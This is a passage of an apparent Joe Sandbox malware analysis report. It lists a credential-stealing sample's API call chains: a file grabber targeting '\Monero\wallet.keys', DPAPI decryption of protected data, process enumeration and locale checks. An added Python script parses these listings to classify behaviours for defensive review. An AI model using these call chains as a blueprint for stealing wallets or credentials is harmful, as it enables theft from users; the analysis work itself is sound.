                              • Associated: 00000000.00000002.2120930222.0000000000F7A000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2121105174.0000000000F8E000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2121105174.0000000001116000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2121105174.00000000011F0000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2121105174.0000000001211000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2121105174.0000000001218000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2121105174.0000000001228000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2121435599.0000000001229000.00000080.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2121551459.00000000013C2000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2121571129.00000000013C3000.00000080.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_d30000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcat$BinaryCryptStringlstrlen
                              • String ID:
                              • API String ID: 189259977-0
                              • Opcode ID: ee1c8d15561b2097973e029df35ecf6fd2317d7e12124cbc13d2f18f44a09959
                              • Instruction ID: b4c59a6ce5c5cc83c0bbd3808d2ade7ce9ee4d9b551219e305626d1d8b51db5c
                              • Opcode Fuzzy Hash: ee1c8d15561b2097973e029df35ecf6fd2317d7e12124cbc13d2f18f44a09959
                              • Instruction Fuzzy Hash: 154172B5D1421EDFDB10DF90DD89BFEB7B8BB88705F1041A8E509A6280D7705A84DFA2
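The function blocks on this page describe the sample's behaviour only as flat lists of resolved API calls: an enumerate-and-copy file grabber (FindFirstFileA / StrCmpCA / CopyFileA / DeleteFileA / FindNextFileA / FindClose, with a subcall that builds a "\Monero\wallet.keys" path), a keyboard-layout and locale enumeration chain (GetKeyboardLayoutList / GetLocaleInfoA), CryptStringToBinaryA decoding, and a CryptUnprotectData / WideCharToMultiByte chain. The script below is an added example written for this review, not Joe Sandbox code and not part of the original report: it parses those "APIs" bullets and tags each function with the behaviour its call set implies. The behaviour rule names and descriptions are the reviewer's own groupings (assumptions, not Joe Sandbox signatures); the two StrCmpCA calls in each walk compare against string addresses the report does not resolve, so no claim is made about what they match. The sample input is copied from the listings on this page.

```python
"""Parse the per-function "APIs" bullets of a Joe Sandbox report and map the
call sets to the stealer behaviours they implement (added review example)."""
from __future__ import annotations

import re
from collections import Counter
from dataclasses import dataclass

# One "APIs" bullet, with or without the "Part of subcall function XXXXXXXX:" prefix.
API_RE = re.compile(
    r"^\s*•?\s*(?:Part of subcall function (?P<sub>[0-9A-Fa-f]{8}):\s*)?"
    r"(?P<api>\w+)\.(?P<mod>\w+)\((?P<args>.*?)\),\s*ref:\s*(?P<ref>[0-9A-Fa-f]{8})\s*$"
)

# Reviewer-defined behaviour rules (assumption): name -> (APIs that must all appear, description).
BEHAVIOUR_RULES = {
    "dir_walk": ({"FindFirstFileA", "FindNextFileA"}, "directory enumeration loop"),
    "file_grab": ({"FindFirstFileA", "FindNextFileA", "CopyFileA"}, "enumerate-then-copy file grabber"),
    "locale_check": ({"GetKeyboardLayoutList", "GetLocaleInfoA"}, "keyboard layout / locale enumeration"),
    "base64_decode": ({"CryptStringToBinaryA"}, "CryptStringToBinary decoding of embedded strings"),
    "dpapi_unprotect": ({"CryptUnprotectData"}, "DPAPI decryption of a protected blob"),
}


@dataclass
class ApiCall:
    api: str
    module: str
    args: list[str]
    ref: str              # address of the call site
    subcall: str | None   # helper function the call lives in, if any


def parse_api_lines(text: str) -> list[ApiCall]:
    """Return every API bullet in `text` in listing order; other lines are ignored."""
    calls = []
    for line in text.splitlines():
        m = API_RE.match(line)
        if m:
            args = m.group("args").split(",") if m.group("args") else []
            calls.append(ApiCall(m.group("api"), m.group("mod").upper(), args,
                                 m.group("ref").upper(), m.group("sub")))
    return calls


def classify(calls: list[ApiCall], include_subcalls: bool = True) -> list[str]:
    """Names of every rule whose required APIs all occur in `calls`, sorted."""
    apis = {c.api for c in calls if include_subcalls or c.subcall is None}
    return sorted(name for name, (required, _) in BEHAVIOUR_RULES.items() if required <= apis)


def path_like_args(calls: list[ApiCall]) -> set[str]:
    """Arguments the sandbox resolved to a string containing a backslash (paths, wildcards)."""
    return {a for c in calls for a in c.args if "\\" in a}


def module_histogram(calls: list[ApiCall]) -> Counter:
    return Counter(c.module for c in calls)


# Sample input (copied from this report's function listings).
SAMPLE_FILE_GRABBER = r"""
  • Part of subcall function 00D4A740: lstrcpy.KERNEL32(00D50E17,00000000), ref: 00D4A788
• FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,00D5510C,?,?,?,00D551B4,?,?,00000000,?,00000000), ref: 00D31923
• StrCmpCA.SHLWAPI(?,00D5525C), ref: 00D31973
• StrCmpCA.SHLWAPI(?,00D55304), ref: 00D31989
• CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 00D31D40
• DeleteFileA.KERNEL32(00000000), ref: 00D31DCA
• FindNextFileA.KERNEL32(000000FF,?), ref: 00D31E20
• FindClose.KERNEL32(000000FF), ref: 00D31E32
  • Part of subcall function 00D4A920: lstrcpy.KERNEL32(00000000,?), ref: 00D4A972
  • Part of subcall function 00D4A920: lstrcat.KERNEL32(00000000), ref: 00D4A982
  • Part of subcall function 00D4A9B0: lstrlen.KERNEL32(?,008D8A30,?,\Monero\wallet.keys,00D50E17), ref: 00D4A9C5
  • Part of subcall function 00D4A9B0: lstrcpy.KERNEL32(00000000), ref: 00D4AA04
  • Part of subcall function 00D4A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00D4AA12
  • Part of subcall function 00D4A8A0: lstrcpy.KERNEL32(?,00D50E17), ref: 00D4A905
"""
SAMPLE_LOCALE = r"""
  • Part of subcall function 00D4A740: lstrcpy.KERNEL32(00D50E17,00000000), ref: 00D4A788
• GetKeyboardLayoutList.USER32(00000000,00000000,00D505AF), ref: 00D47BE1
• LocalAlloc.KERNEL32(00000040,?), ref: 00D47BF9
• GetKeyboardLayoutList.USER32(?,00000000), ref: 00D47C0D
• GetLocaleInfoA.KERNEL32(?,00000002,?,00000200), ref: 00D47C62
• LocalFree.KERNEL32(00000000), ref: 00D47D22
"""
SAMPLE_DPAPI = r"""
• GetProcessHeap.KERNEL32(00000008,00000400), ref: 00D3724D
• RtlAllocateHeap.NTDLL(00000000), ref: 00D37254
• CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000001,?), ref: 00D37281
• WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,?,00000400,00000000,00000000), ref: 00D372A4
• LocalFree.KERNEL32(?), ref: 00D372AE
"""

if __name__ == "__main__":
    for name, block in [("file grabber", SAMPLE_FILE_GRABBER), ("locale check", SAMPLE_LOCALE),
                        ("dpapi", SAMPLE_DPAPI)]:
        calls = parse_api_lines(block)
        print(f"{name}: {len(calls)} calls, behaviours={classify(calls)}, "
              f"paths={sorted(path_like_args(calls))}, modules={dict(module_histogram(calls))}")
```

The first GetKeyboardLayoutList call with a zero buffer returns the count, LocalAlloc sizes the array, and the second call fills it before GetLocaleInfoA is applied to each layout; stealers commonly use this chain to bail out on particular locales, which is why the rule is kept separate from the generic grabber rules. `classify(..., include_subcalls=False)` drops the lstrcpy/lstrcat helpers so a function is tagged only by what it calls directly.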
                              APIs
                              • GetProcessHeap.KERNEL32(00000008,00000400), ref: 00D3724D
                              • RtlAllocateHeap.NTDLL(00000000), ref: 00D37254
                              • CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000001,?), ref: 00D37281
                              • WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,?,00000400,00000000,00000000), ref: 00D372A4
                              • LocalFree.KERNEL32(?), ref: 00D372AE
                              Memory Dump Source
                              • Source File: 00000000.00000002.2120930222.0000000000D31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                              • Associated: 00000000.00000002.2120913969.0000000000D30000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2120930222.0000000000DE1000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2120930222.0000000000DED000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2120930222.0000000000E12000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2120930222.0000000000F7A000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2121105174.0000000000F8E000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2121105174.0000000001116000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2121105174.00000000011F0000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2121105174.0000000001211000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2121105174.0000000001218000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2121105174.0000000001228000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2121435599.0000000001229000.00000080.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2121551459.00000000013C2000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2121571129.00000000013C3000.00000080.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_d30000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Heap$AllocateByteCharCryptDataFreeLocalMultiProcessUnprotectWide
                              • String ID:
                              • API String ID: 2609814428-0
                              APIs
                              • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 00D4961E
                              • Process32First.KERNEL32(00D50ACA,00000128), ref: 00D49632
                              • Process32Next.KERNEL32(00D50ACA,00000128), ref: 00D49647
                              • StrCmpCA.SHLWAPI(?,00000000), ref: 00D4965C
                              • CloseHandle.KERNEL32(00D50ACA), ref: 00D4967A
                              Memory Dump Source
                              • Source File: 00000000.00000002.2120930222.0000000000D31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_d30000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32
                              • String ID:
                              • API String ID: 420147892-0
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2121105174.0000000000F8E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_d30000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID:
                              • String ID: 2n{$4<8>$;Pq$XS5
                              • API String ID: 0-991479744
                              APIs
                                • Part of subcall function 00D4A740: lstrcpy.KERNEL32(00D50E17,00000000), ref: 00D4A788
                              • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,00D505B7), ref: 00D486CA
                              • Process32First.KERNEL32(?,00000128), ref: 00D486DE
                              • Process32Next.KERNEL32(?,00000128), ref: 00D486F3
                                • Part of subcall function 00D4A9B0: lstrlen.KERNEL32(?,008D8A30,?,\Monero\wallet.keys,00D50E17), ref: 00D4A9C5
                                • Part of subcall function 00D4A9B0: lstrcpy.KERNEL32(00000000), ref: 00D4AA04
                                • Part of subcall function 00D4A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00D4AA12
                                • Part of subcall function 00D4A8A0: lstrcpy.KERNEL32(?,00D50E17), ref: 00D4A905
                              • CloseHandle.KERNEL32(?), ref: 00D48761
                              Memory Dump Source
                              • Source File: 00000000.00000002.2120930222.0000000000D31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_d30000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcpy$Process32$CloseCreateFirstHandleNextSnapshotToolhelp32lstrcatlstrlen
                              • String ID:
                              • API String ID: 1066202413-0
                              APIs
                              • CryptBinaryToStringA.CRYPT32(00000000,00D35184,40000001,00000000,00000000,?,00D35184), ref: 00D48EC0
                              Memory Dump Source
                              • Source File: 00000000.00000002.2120930222.0000000000D31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_d30000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: BinaryCryptString
                              • String ID:
                              • API String ID: 80407269-0
                              APIs
                              • CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,00D34EEE,00000000,00000000), ref: 00D39AEF
                              • LocalAlloc.KERNEL32(00000040,?,?,?,00D34EEE,00000000,?), ref: 00D39B01
                              • CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,00D34EEE,00000000,00000000), ref: 00D39B2A
                              • LocalFree.KERNEL32(?,?,?,?,00D34EEE,00000000,?), ref: 00D39B3F
                              Memory Dump Source
                              • Source File: 00000000.00000002.2120930222.0000000000D31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_d30000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: BinaryCryptLocalString$AllocFree
                              • String ID:
                              • API String ID: 4291131564-0
                              APIs
                              • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,00D50E00,00000000,?), ref: 00D479B0
                              • RtlAllocateHeap.NTDLL(00000000), ref: 00D479B7
                              • GetLocalTime.KERNEL32(?,?,?,?,?,00D50E00,00000000,?), ref: 00D479C4
                              • wsprintfA.USER32 ref: 00D479F3
                              Memory Dump Source
                              • Source File: 00000000.00000002.2120930222.0000000000D31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_d30000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Heap$AllocateLocalProcessTimewsprintf
                              • String ID:
                              • API String ID: 377395780-0
                              APIs
                              • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,00000000,00000000,?,008DDC68,00000000,?,00D50E10,00000000,?,00000000,00000000), ref: 00D47A63
                              • RtlAllocateHeap.NTDLL(00000000), ref: 00D47A6A
                              • GetTimeZoneInformation.KERNEL32(?,?,?,?,00000000,00000000,?,008DDC68,00000000,?,00D50E10,00000000,?,00000000,00000000,?), ref: 00D47A7D
                              • wsprintfA.USER32 ref: 00D47AB7
                              Memory Dump Source
                              • Source File: 00000000.00000002.2120930222.0000000000D31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_d30000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Heap$AllocateInformationProcessTimeZonewsprintf
                              • String ID:
                              • API String ID: 3317088062-0
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2121105174.0000000000F8E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_d30000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID:
                              • String ID: F=|b$Jk/8$fw{~$b?
                              • API String ID: 0-647256904
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2121105174.0000000000F8E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_d30000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID:
                              • String ID: I;$`k;$~N+$V7[
                              • API String ID: 0-2527083691
                              • Opcode ID: 644147d9961457421d9a8a08048ee3f381c6a210bcd7b31020c43a1380aaad8b
                              • Instruction ID: 25d7af1305f616f7d1d78888fcb0f4e4d983f713c904215c3b910fab205d8d1e
                              • Opcode Fuzzy Hash: 644147d9961457421d9a8a08048ee3f381c6a210bcd7b31020c43a1380aaad8b
                              • Instruction Fuzzy Hash: 8C32D2F350C200AFE315AE29EC8577ABBE5EF94720F1A892DE6C4C7744E63598408797
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2121105174.0000000000F8E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                              • Associated: 00000000.00000002.2120913969.0000000000D30000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2120930222.0000000000D31000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2120930222.0000000000DE1000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2120930222.0000000000DED000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2120930222.0000000000E12000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2120930222.0000000000F7A000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2121105174.0000000001116000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2121105174.00000000011F0000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2121105174.0000000001211000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2121105174.0000000001218000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2121105174.0000000001228000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2121435599.0000000001229000.00000080.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2121551459.00000000013C2000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2121571129.00000000013C3000.00000080.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_d30000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID:
                              • String ID: "{/$D}}$ot
                              • API String ID: 0-378467387
                              • Opcode ID: 64c290e8ebfd969acf0ace3a9ee1abb3e0e2d8e1fc8ab28df4dd9e0eeae713ba
                              • Instruction ID: 75c85bd24acb5eb0a862cdac1ea0052d09f289b6b3435d0c0e0c32dd413651a9
                              • Opcode Fuzzy Hash: 64c290e8ebfd969acf0ace3a9ee1abb3e0e2d8e1fc8ab28df4dd9e0eeae713ba
                              • Instruction Fuzzy Hash: 9BA24DF3608204AFE3046E2DEC8567BBBD9EFD4720F1A863DEAC4D3744E93558058696
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2121105174.0000000000F8E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                              • Associated: 00000000.00000002.2120913969.0000000000D30000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2120930222.0000000000D31000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2120930222.0000000000DE1000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2120930222.0000000000DED000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2120930222.0000000000E12000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2120930222.0000000000F7A000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2121105174.0000000001116000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2121105174.00000000011F0000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2121105174.0000000001211000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2121105174.0000000001218000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2121105174.0000000001228000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2121435599.0000000001229000.00000080.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2121551459.00000000013C2000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2121571129.00000000013C3000.00000080.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_d30000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID:
                              • String ID: @<{h$T;Y5$im7
                              • API String ID: 0-4077018143
                              • Opcode ID: 4706343f72d17441be2008658873c9ef571c35158150485dec8adfb4ee91baec
                              • Instruction ID: 520be446ebf35862908e062f7a1fc56e8f29840be91baee7894b7aa82c67b05b
                              • Opcode Fuzzy Hash: 4706343f72d17441be2008658873c9ef571c35158150485dec8adfb4ee91baec
                              • Instruction Fuzzy Hash: 77B2F8F3A0C2049FE304AE2DEC8567ABBE9EF94720F16453DEAC4C7744EA3558058697
                              APIs
                              • CoCreateInstance.COMBASE(00D4E118,00000000,00000001,00D4E108,00000000), ref: 00D43758
                              • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,00000104), ref: 00D437B0
                              Memory Dump Source
                              • Source File: 00000000.00000002.2120930222.0000000000D31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                              • Associated: 00000000.00000002.2120913969.0000000000D30000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2120930222.0000000000DE1000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2120930222.0000000000DED000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2120930222.0000000000E12000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2120930222.0000000000F7A000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2121105174.0000000000F8E000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2121105174.0000000001116000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2121105174.00000000011F0000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2121105174.0000000001211000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2121105174.0000000001218000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2121105174.0000000001228000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2121435599.0000000001229000.00000080.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2121551459.00000000013C2000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2121571129.00000000013C3000.00000080.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_d30000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: ByteCharCreateInstanceMultiWide
                              • String ID:
                              • API String ID: 123533781-0
                              • Opcode ID: ed431a7ff9823f93bfd929b5a2d7bcce5411d68bbca71bd4fbebe05b11e22981
                              • Instruction ID: e2204b18fa239e4a8b4bdf36829aa95afe1dea6f295647ffcd10ed4ceafda9e1
                              • Opcode Fuzzy Hash: ed431a7ff9823f93bfd929b5a2d7bcce5411d68bbca71bd4fbebe05b11e22981
                              • Instruction Fuzzy Hash: 6E41D670A40A28AFDB24DB58CC95B9BB7B5BB48702F5041D8E618A7290D771AE85CF60
                              APIs
                              • CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,?), ref: 00D39B84
                              • LocalAlloc.KERNEL32(00000040,00000000), ref: 00D39BA3
                              • LocalFree.KERNEL32(?), ref: 00D39BD3
                              Memory Dump Source
                              • Source File: 00000000.00000002.2120930222.0000000000D31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                              • Associated: 00000000.00000002.2120913969.0000000000D30000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2120930222.0000000000DE1000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2120930222.0000000000DED000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2120930222.0000000000E12000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2120930222.0000000000F7A000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2121105174.0000000000F8E000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2121105174.0000000001116000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2121105174.00000000011F0000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2121105174.0000000001211000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2121105174.0000000001218000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2121105174.0000000001228000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2121435599.0000000001229000.00000080.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2121551459.00000000013C2000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2121571129.00000000013C3000.00000080.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_d30000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Local$AllocCryptDataFreeUnprotect
                              • String ID:
                              • API String ID: 2068576380-0
                              • Opcode ID: 7e383ad55746751b5009005ab7190ed4d7440bcfbb631b3427151f66636cd82c
                              • Instruction ID: e027b9149c6e8b1c79dc36142611f0151a28cc159a815c2f995ddeb0e0c27f24
                              • Opcode Fuzzy Hash: 7e383ad55746751b5009005ab7190ed4d7440bcfbb631b3427151f66636cd82c
                              • Instruction Fuzzy Hash: 7111CCB8A00209DFDB04DF94D985AAEB7B9FF88300F104558E91597354D774AE51CF62
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2121105174.0000000000F8E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                              • Associated: 00000000.00000002.2120913969.0000000000D30000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2120930222.0000000000D31000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2120930222.0000000000DE1000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2120930222.0000000000DED000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2120930222.0000000000E12000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2120930222.0000000000F7A000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2121105174.0000000001116000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2121105174.00000000011F0000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2121105174.0000000001211000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2121105174.0000000001218000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2121105174.0000000001228000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2121435599.0000000001229000.00000080.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2121551459.00000000013C2000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2121571129.00000000013C3000.00000080.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_d30000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID:
                              • String ID: -To}$}p][
                              • API String ID: 0-2228264133
                              • Opcode ID: 3dfe5360321b6fe9235dccd130d6a250ba0b65d968ce404514bda9c88dfa792d
                              • Instruction ID: d16ce5f7b32333fe94e63a97c70f4318c244a7b6af3a8da21c79b8715a5f1675
                              • Opcode Fuzzy Hash: 3dfe5360321b6fe9235dccd130d6a250ba0b65d968ce404514bda9c88dfa792d
                              • Instruction Fuzzy Hash: C7A2F3F360C2049FE3046F2DEC8567ABBE9EF94720F1A493DE6C487740EA3598458697
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2121105174.0000000000F8E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                              • Associated: 00000000.00000002.2120913969.0000000000D30000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2120930222.0000000000D31000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2120930222.0000000000DE1000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2120930222.0000000000DED000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2120930222.0000000000E12000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2120930222.0000000000F7A000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2121105174.0000000001116000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2121105174.00000000011F0000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2121105174.0000000001211000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2121105174.0000000001218000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2121105174.0000000001228000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2121435599.0000000001229000.00000080.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2121551459.00000000013C2000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2121571129.00000000013C3000.00000080.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_d30000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID:
                              • String ID: I{$f02<
                              • API String ID: 0-3195043514
                              • Opcode ID: 8bd004c995bd4cb26dc8c519bd316e2c3d0f577b0e7ba96f43b4ccf7c1eb5612
